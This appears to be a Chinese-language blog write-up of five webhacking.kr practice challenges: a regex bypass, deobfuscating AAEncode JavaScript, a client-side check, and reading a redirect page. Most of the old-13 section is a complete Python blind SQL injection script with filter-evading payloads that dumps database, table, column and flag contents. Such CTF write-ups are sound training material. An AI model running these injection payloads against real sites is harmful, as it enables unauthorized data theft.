webhacking.kr 一天五題系列 III

Albert Huang MED student | CS enthusiast

old-11

本題考點:正規表達式解析、URL 編碼字元轉義

來看一下 source code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
include "../../config.php";
if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 11</title>
<style type="text/css">
body { background:black; color:white; font-size:10pt; }
</style>
</head>
<body>
<center>
<br><br>
<?php
$pat="/[1-3][a-f]{5}_.*$_SERVER[REMOTE_ADDR].*\tp\ta\ts\ts/";
if(preg_match($pat,$_GET['val'])){
solve(11);
}
else echo("<h2>Wrong</h2>");
echo("<br><br>");
?>
<a href=./?view_source=1>view-source</a>
</center>
</body>
</html>

簡單明瞭,只要讓 $_GET['val'] 符合他的 regex 限制即可,來解讀一下他的 regex:

1
2
3
/[1-3][a-f]{5}_.*$_SERVER[REMOTE_ADDR].*\tp\ta\ts\ts/

[1-3] 任一數 + [a-f] 任何字重複5次 + _ + my_ip + %09p%09a%09s%09s

old-12

本題考點:AAEncode 混淆技術與還原、客戶端動態偵錯

題目只寫 javascript challenge,打開 source code 看一下發現是 AAEncode,用 https://jamtg.github.io/aaencode-and-aadecode/ 可以解開, code 如下所示:

1
2
3
4
5
6
7
8
9
10
11
12
13
var enco='';
var enco2=126;
var enco3=33;
var ck=document.URL.substr(document.URL.indexOf('='));
for(i=1;i<122;i++){
enco=enco+String.fromCharCode(i,0);
}
function enco_(x){
return enco.charCodeAt(x);
}
if(ck=="="+String.fromCharCode(enco_(240))+String.fromCharCode(enco_(220))+String.fromCharCode(enco_(232))+String.fromCharCode(enco_(192))+String.fromCharCode(enco_(226))+String.fromCharCode(enco_(200))+String.fromCharCode(enco_(204))+String.fromCharCode(enco_(222-2))+String.fromCharCode(enco_(198))+"~~~~~~"+String.fromCharCode(enco2)+String.fromCharCode(enco3)){
location.href="./"+ck.replace("=","")+".php";
}

直接讓他 console.log() 就會知道 ck 需要長成甚麼樣子,到那個 .php 去就可以了。

old-13

本題考點:Blind SQLi with WAF bypass

進到題目就直接開宗明義跟妳說是 SQL Injection 了,一樣是 Blind SQLi。嘗試之後發現 true 會顯示 1、false 會顯示 0,就跟一般的 Blind SQLi 一樣。

不過嘗試一下會發現某一些字元會顯示 no hack,如 =likewhereascii 等,因此需要特別注意這些字元。

使用 Python 實作:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
import requests
import string

# database
database_length = 0
while True:
payload = f'if(LENGTH(database())in({database_length}),1,0)'
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
break
database_length += 1

database_name = ''
for i in range(1, database_length+1):
for char in string.printable:
payload = f"if(ord(SUBSTR(database(),{i},1))in({ord(char)}),1,0)"
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
database_name += char
print(database_name)
break

# table
table_number = 0
while True:
payload = f'if((SELECT(COUNT(if((SELECT(table_schema)in(database())),table_name,null)))from(information_schema.tables))in({table_number}),1,0)'
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
break
table_number += 1

table_length_1 = 0
while True:
payload = f'if((SELECT(LENGTH(min(if((SELECT(table_schema)in(database())),table_name,null))))from(information_schema.tables))in({table_length_1}),1,0)'
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
break
table_length_1 += 1

table_length_2 = 0
while True:
payload = f'if((SELECT(LENGTH(max(if((SELECT(table_schema)in(database())),table_name,null))))from(information_schema.tables))in({table_length_2}),1,0)'
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
break
table_length_2 += 1

table_name_1 = ''
for i in range(1, table_length_1+1):
for char in string.printable:
payload = f"if((SELECT(ord(SUBSTR(min(if((SELECT(table_schema)in(database())),table_name,null)),{i},1)))from(information_schema.tables))in({ord(char)}),1,0)"
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
table_name_1 += char
print(table_name_1)
break

table_name_2 = ''
for i in range(1, table_length_2+1):
for char in string.printable:
payload = f"if((SELECT(ord(SUBSTR(max(if((SELECT(table_schema)in(database())),table_name,null)),{i},1)))from(information_schema.tables))in({ord(char)}),1,0)"
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
table_name_2 += char
print(table_name_2)
break

def str2bin(string):
return '0b' + ''.join(format(ord(x), 'b').zfill(8) for x in string)

# column
column_number = 0
while True:
payload = f'if((SELECT(COUNT(if((SELECT(table_name)in({str2bin(table_name_1)})),column_name,null)))from(information_schema.columns))in({column_number}),1,0)'
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
break
column_number += 1
print(column_number)

column_length = 0
while True:
payload = f'if((SELECT(LENGTH(min(if((SELECT(table_name)in({str2bin(table_name_1)})),column_name,null))))from(information_schema.columns))in({column_length}),1,0)'
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
break
column_length += 1

column_name = ''
for i in range(1, column_length+1):
for char in string.printable:
payload = f"if((SELECT(ord(SUBSTR(min(if((SELECT(table_name)in({str2bin(table_name_1)})),column_name,null)),{i},1)))from(information_schema.columns))in({ord(char)}),1,0)"
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
column_name += char
print(column_name)
break

# flag
flag_number = 0
while True:
payload = f'if((SELECT(COUNT(({column_name})))FROM({database_name}.{table_name_1}))in({flag_number}),1,0)'
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
break
flag_number += 1

flag_length_1 = 0
while True:
payload = f'if((SELECT(LENGTH(min({column_name})))FROM({database_name}.{table_name_1}))in({flag_length_1}),1,0)'
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
break
flag_length_1 += 1

flag_length_2 = 0
while True:
payload = f'if((SELECT(LENGTH(max({column_name})))FROM({database_name}.{table_name_1}))in({flag_length_2}),1,0)'
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
break
flag_length_2 += 1

flag_name_1 = ''
for i in range(1, flag_length_1+1):
for char in string.printable:
payload = f"if((SELECT(ord(SUBSTR(min({column_name}),{i},1)))FROM({database_name}.{table_name_1}))in({ord(char)}),1,0)"
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
flag_name_1 += char
print(flag_name_1)
break

flag_name_2 = ''
for i in range(1, flag_length_2+1):
for char in string.printable:
payload = f"if((SELECT(ord(SUBSTR(max({column_name}),{i},1)))FROM({database_name}.{table_name_1}))in({ord(char)}),1,0)"
params = f'no={payload}'
r = requests.get('https://webhacking.kr/challenge/web-10/', params=params)
if '<td>1</td>' in r.text:
flag_name_2 += char
print(flag_name_2)
break

有很多限制而且 table 不只一個,所以 expression 難度較高,算是有挑戰性的題目

old-14

本題考點:Dynamic Client-side Calculation

給了一個輸入框,來看一下 source code:

1
2
3
4
5
6
7
8
9
10
11
<form name="pw" onsubmit="ck();return false"><input type="text" name="input_pwd"><input type="button" value="check" onclick="ck()"></form>
<script>
function ck(){
var ul=document.URL;
ul=ul.indexOf(".kr");
ul=ul*30;
if(ul==pw.input_pwd.value) { location.href="?"+ul*pw.input_pwd.value; }
else { alert("Wrong"); }
return false;
}
</script>

很明顯是要輸入符合 ul 的值,直接用 console 就可以得到答案,並且把 onsubmitreturn false patch 掉之後輸入 ul 的值即可過關。

old-15

本題考點:原始碼靜態分析

進到題目之後直接彈出 Access_Denied,用 curl 看一下。

1
2
3
4
5
6
7
8
9
10
11
12
$ curl https://webhacking.kr/challenge/js-2/
<html>
<head>
<title>Challenge 15</title>
</head>
<body>
<script>
alert("Access_Denied");
location.href='/';
document.write("<a href=?getFlag>[Get Flag]</a>");
</script>
</body>

可以看到有一個連結指向 flag,直接造訪他即可。

  • Title: webhacking.kr 一天五題系列 III
  • Author: Albert Huang
  • Created at : 2026-06-16 10:53:04
  • Updated at : 2026-06-26 14:08:16
  • Link: https://blog.albert-web.tw/2026/06/16/webhacking-writeup-3/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
webhacking.kr 一天五題系列 III